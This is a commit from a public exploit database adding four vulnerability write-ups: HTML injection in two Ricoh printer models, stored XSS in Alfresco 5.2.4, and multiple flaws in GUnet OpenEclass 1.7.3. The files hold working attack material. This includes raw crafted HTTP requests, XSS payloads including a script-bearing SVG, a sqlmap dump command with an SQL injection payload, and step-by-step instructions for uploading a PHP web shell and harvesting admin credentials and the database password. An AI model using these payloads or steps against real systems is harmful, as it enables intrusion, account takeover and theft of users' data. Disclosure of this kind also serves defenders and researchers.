DB: 2020-03-04

4 changes to exploits/shellcodes

RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
Alfresco 5.2.4 - Persistent Cross-Site Scripting
GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
This commit is contained in:
Offensive Security 2020-03-04 05:01:50 +00:00
parent afe5797b88
commit d85ad29bbc
5 changed files with 345 additions and 0 deletions

View file

@ -0,0 +1,73 @@
# Exploit Title: RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection
# Discovery by: Paulina Girón
# Discovery Date: 2020-03-02
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/re2/model/sp52s/sp52s.htm
# Product Version: RICOH Aficio SP 5200S Printer
# Vulnerability Type: Code Injection - HTML Injection
# Steps to Produce the HTML Injection:
#1.- HTTP POST Request 'adrsGetUser.cgi':
POST /web/entry/es/address/adrsGetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 447
Cache-Control: max-age=0
Origin: http://xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsList.cgi
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
Connection: close
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=13&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00005=ADRS_ENTRY_USER&00006=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00009=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 15:15:59 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 15:15:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
#2.- HTTP POST Request 'adrsSetUser.cgi':
POST /web/entry/es/address/adrsSetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 611
Cache-Control: max-age=0
Origin: http://xxx.xxx.xxx.xxx
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://xxx.xxx.xxx.xxx/web/entry/es/address/adrsGetUser.cgi
Accept-Encoding: gzip, deflate
Accept-Language: es-ES,es;q=0.9
Cookie: risessionid=059501971327590; cookieOnOffChecker=on; wimsesid=110507639
Connection: close
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00012&entryNameIn=prueba&entryDisplayNameIn=prueba&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 15:17:10 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 15:17:10 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

View file

@ -0,0 +1,73 @@
# Exploit Title: RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection
# Discovery by: Olga Villagran
# Discovery Date: 2020-03-02
# Vendor Homepage: https://www.ricoh.com/
# Hardware Link: http://support.ricoh.com/bb/html/dr_ut_e/rc3/model/sp52s/sp52s.htm?lang=es
# Product Version: RICOH Aficio SP 5210SF Printer
# Vulnerability Type: Code Injection - HTML Injection
# Steps to Produce the HTML Injection:
#1.- HTTP POST Request 'adrsGetUser.cgi':
POST /web/entry/en/address/adrsGetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsList.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 402
Connection: close
Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
Upgrade-Insecure-Requests: 1
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=1&searchSpecifyModeIn=&outputSpecifyModeIn=DEFAULT&entryIndexIn=&entryNameIn=&entryFilterIn=ALL_O&searchItemIn=SEARCH_INDEX_O&searchDataIn=&pages=&listCountIn=10&totalCount=8&offset=0&00001=ADRS_ENTRY_USER&00002=ADRS_ENTRY_USER&00003=ADRS_ENTRY_USER&00004=ADRS_ENTRY_USER&00007=ADRS_ENTRY_USER&00008=ADRS_ENTRY_USER&00010=ADRS_ENTRY_USER&00012=ADRS_ENTRY_USER
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 22:22:44 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 22:22:44 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close
#2.- HTTP POST Request 'adrsSetUser.cgi':
POST /web/entry/en/address/adrsSetUser.cgi HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://xxx.xxx.xxx.xxx/web/entry/en/address/adrsGetUser.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 607
Connection: close
Cookie: risessionid=083527814813645; cookieOnOffChecker=on; wimsesid=121318357
Upgrade-Insecure-Requests: 1
mode=ADDUSER&pageSpecifiedIn=&pageNumberIn=&searchSpecifyModeIn=&outputSpecifyModeIn=&inputSpecifyModeIn=WRITE&wayFrom=adrsGetUser.cgi%3FoutputSpecifyModeIn%3DSETTINGS&wayTo=adrsList.cgi%3FsearchSpecifyModeIn%3DNONE&isSelfPasswordEditMode=false&entryIndexIn=00005&entryNameIn=test&entryDisplayNameIn=test&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&entryTagInfoIn=1&userCodeIn=&smtpAuthAccountIn=AUTH_SYSTEM_O&folderAuthAccountIn=AUTH_SYSTEM_O&ldapAuthAccountIn=AUTH_SYSTEM_O&entryUseIn=ENTRYUSE_TO_O&faxDestIn=&mailAddressIn=&isCertificateExist=false&folderProtocolIn=SMB_O&folderPathNameIn=
#HTTP Response :
HTTP/1.0 200 OK
Date: Mon, 02 Mar 2020 22:23:10 GMT
Server: Web-Server/3.0
Content-Type: text/html; charset=UTF-8
Expires: Mon, 02 Mar 2020 22:23:10 GMT
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: cookieOnOffChecker=on; path=/
Connection: close

View file

@ -0,0 +1,79 @@
# Exploit Title: Alfresco 5.2.4 - Persistent Cross-Site Scripting
# Date: 2020-03-02
# Exploit Author: Romain LOISEL & Alexandre ZANNI (https://pwn.by/noraj) - Pentesters from Orange Cyberdefense France
# Vendor Homepage: https://www.alfresco.com/
# Software Link: https://www.alfresco.com/ecm-software
# Version: Alfresco before 5.2.4
# Tested on: 5.2.4
# CVE : CVE-2020-8776, CVE-2020-8777, CVE-2020-8778
# Security advisory: https://gitlab.com/snippets/1937042
### Stored XSS n°1 - Document URL - CVE-2020-8776 (found by Alexandre ZANNI)
Each file has a set of properties than can be edited by any authenticated user
that have write access on the project or the file.
The **URL** property of the file provided by the user is injected in the `href`
attribute of the HTML link without a proper escaping.
- Where? In URL property
- Payload: `" onmouseover="alert(document.cookie)"`
- Details: On the document explorer, the value is injected in a span tag. But on the detailed view of the file, it's inserted in the `href` attribute of a `a` tag. `http://` is prefixed before the payload provided by the user but can be bypassed. The generated vulnerable link will look like that:
```html
<a target="_blank" href="http://" onmouseover="alert(document.cookie)" "=" ">http://" onmouseover="alert(document.cookie)"</a>
```
- Privileges: It requires write privileges to store it, any user with read access can see it.
- Steps to reproduce:
1. Go to _Document Library_
2. Upload a file or click _Edit properties_ on an existing file
3. Enter the payload in the URL property
4. Click on the file title to go on the detailed page of the file
5. Hover the displayed link to trigger the XSS
### Stored XSS n°2 - User profile photo upload / Document viewing - CVE-2020-8777 (found by Alexandre ZANNI)
There is no file restriction for photo uploading in the user profile page.
Then the profile picture can be seen in the browser.
- Where? In user profile photo
- Payload:
```xml
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,200 200,200 200,0" fill="#FF6804" stroke="#000000"/>
<script type="text/javascript">
alert('XSS - Orange Cyberdefense');
</script>
</svg>
```
- Details: The XSS is not triggerred everywhere, only with the _View in browser_ feature.
- Privileges: Any authenticated user can store it or trigger it.
- Steps to reproduce:
1. Go to your user profile page (`/share/page/user/<username>/profile`)
2. In the _Photo_ section, click _Upload_ and upload the SVG payload file
3. Use the document browser or any dashboard to find the uploaded file
4. Click on the title to go to the detailed page of the file
5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)
### Stored XSS n°3 - Generic file upload / Document viewing - CVE-2020-8778 (found by Romain LOISEL)
This is the generic version of the previous XSS. Uploading dangerous file types
is allowed and then they can be viewed to triggered the XSS. The difference
between the two is that this one requires right access on a project to upload
documents so the XSS is not exploitable with a read only account but the
previous one can be exploited by any user as any user is allowed to have a
profile photo.
- Where? Uploading a document anywhere
- Payload: any file type that can store and execute a JavaScript payload (eg. HTML, SVG, XML, etc.)
- Details: The XSS is triggerred only with the _View in browser_ feature.
- Privileges: Any authenticated user with write access to a project can store it and any user that have read access to the file or project can trigger it.
- Steps to reproduce:
1. Go to a project dashboard
2. IClick _Upload_ and upload a dangerous file
3. Use the document browser or any dashboard to find the uploaded file
4. Click on the title to go to the detailed page of the file
5. On the right panel, click the _View in browser_ link to trigger the XSS (on load)

View file

@ -0,0 +1,116 @@
# Exploit Title: GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection
# Google Dork: intext:"© GUnet 2003-2007"
# Date: 2020-03-02
# Exploit Author: emaragkos
# Vendor Homepage: https://www.openeclass.org/
# Software Link: http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
# Version: 1.7.3 (2007)
# Tested on: Ubuntu 12 (Apache 2.2.22, PHP 5.3.10, MySQL 5.5.38)
# CVE : -
Older versions are also vulnerable.
Source code:
http://download.openeclass.org/files/1.7/eclass-1.7.3.zip
http://download.openeclass.org/files/1.7/eclass-1.7.3.tar.gz
Setup instructions:
http://download.openeclass.org/files/docs/1.7/Install.pdf
Changelog:
https://download.openeclass.org/files/docs/1.7/CHANGES.txt
Manual:
https://download.openeclass.org/files/docs/1.7/eClass.pdf
############################################################################
Unauthenticated Information Disclosure
System info
127.0.0.1/modules/admin/sysinfo
(powered by phpSysInfo 2.0 that is also vulnerable)
Web-App version info
127.0.0.1/README.txt
127.0.0.1/info/about.php
127.0.0.1/upgrade/CHANGES.txt
############################################################################
(Authenticated - Requires student account) - Error-Based SQLi
https://127.0.0.1/modules/agenda/myagenda.php?month=3&year=2020
sqlmap -u "https://127.0.0.1/modules/agenda/myagenda.php?month=2&year=2020" --batch --dump
---
Parameter: month (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: month=5' AND (SELECT 9183 FROM(SELECT COUNT(*),CONCAT(0x7170717671,(SELECT (ELT(9183=9183,1))),0x716b706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Hztw&year=2020'
---
Almost every parameter will be either error-based, boolean-based or time-based vulnerable.
If you have a student account I recommend using this error-based SQLi because you will get all the database content really faster.
If you dont have an account use the following exploit that exploits an unauthenticated time-based blind injection.
It will definately be a slower proccess but you will get the administrator account pretty fast and move on with exploiting other authenticated vulnerabilities.
https://www.exploit-db.com/exploits/48106
############################################################################
(Authenticated - Requires student account) - PHP upload file extension bypass
If you have a student account you can bypass file extension restrictions and upload a PHP shell.
Register as user if the application is configured to allow registrations or use an SQLi to find an account that already exists.
Start looking for a class that you can submit an exercise as a student.
Register in that class and navigate to submit you exercise.
If you try to upload a .php file it will be renamed to .phps to prevent execution.
You can upload your PHP shell by spoofing the extension simply by renaming your .php file to .php3 or .PhP
Once you have uploaded it, open your course directory and then add "work" directory at the end
Course link example: https://127.0.0.1/courses/CS101/
Course link becomes: https://127.0.0.1/courses/CS101/work/
Directory listing will most likely be enabled by default and you will be able to view the directories.
Your shell will be in one of the multiple random alphanumeric directories that look like this /4a0c01h2nad9b/
Final shell link will look like this: https://127.0.0.1/courses/CS101/work/4a0c01h2nad9b/shell.php3
The same method works with "groups" if you cant find a class that supports submitting an exercise.
https://127.0.0.1/modules/group/group.php
############################################################################
(Authenticated - Requires student account) - View assessments of other students
If you have a student account you can view uploaded assessments from other students before or after the deadline that the professor has set.
Find the course link you are interested in.
https://127.0.0.1/courses/CS101
Add "work" directory at the end
https://127.0.0.1/courses/CS101/work/
Directory listing will most likely be enabled by default and you will be able to view and download other students' uploaded assessments.
############################################################################
(Authenticated - Requires admin account) - Upload PHP files
You have to login to the platform as an administrator or user with admin rights.
You can grab the administrator credentials as plaintext with an Unauthenticated Blind SQL Injection using the
following exploit https://www.exploit-db.com/exploits/48106 or use the authenticated SQLi for faster results.
Once you have logged in as admin:
1) Navigate to 127.0.0.1/modules/course_info/restore_course.php
2) Upload your .php shell compressed in a .zip file
3) Ignore the error message
4) Your PHP file is now uploaded to 127.0.0.1/cources/tmpUnzipping/[your-shell-name].php
############################################################################
(Authenticated - Requires admin account) - phpMyAdmin Remote Access
127.0.0.1/modules/admin/mysql
phpMyAdmin 2.10.0.2 is installed by default and allows remote logins
Once you have uploaded your shell can view the config.php file that contains the mysql password
127.0.0.1/config/config.php
############################################################################
(Authenticated - Requires admin account) - Plaintext password storage
When logged in as admin you can view all registered users credentials as plaintext.
127.0.0.1/modules/admin/listusers.php

View file

@ -42427,3 +42427,7 @@ id,file,description,date,author,type,platform,port
48155,exploits/hardware/webapps/48155.py,"TP LINK TL-WR849N - Remote Code Execution",2020-03-02,"Elber Tavares",webapps,hardware,
48158,exploits/hardware/webapps/48158.txt,"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)",2020-03-02,"Elber Tavares",webapps,hardware,
48159,exploits/php/webapps/48159.rb,"Cacti v1.2.8 - Unauthenticated Remote Code Execution (Metasploit)",2020-03-02,"Lucas Amorim",webapps,php,
48161,exploits/hardware/webapps/48161.txt,"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection",2020-03-03,"Paulina Girón",webapps,hardware,
48162,exploits/php/webapps/48162.txt,"Alfresco 5.2.4 - Persistent Cross-Site Scripting",2020-03-03,"Alexandre ZANNI",webapps,php,
48163,exploits/php/webapps/48163.txt,"GUnet OpenEclass 1.7.3 E-learning platform - 'month' SQL Injection",2020-03-03,emaragkos,webapps,php,
48164,exploits/hardware/webapps/48164.txt,"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection",2020-03-03,"Olga Villagran",webapps,hardware,

Can't render this file because it is too large.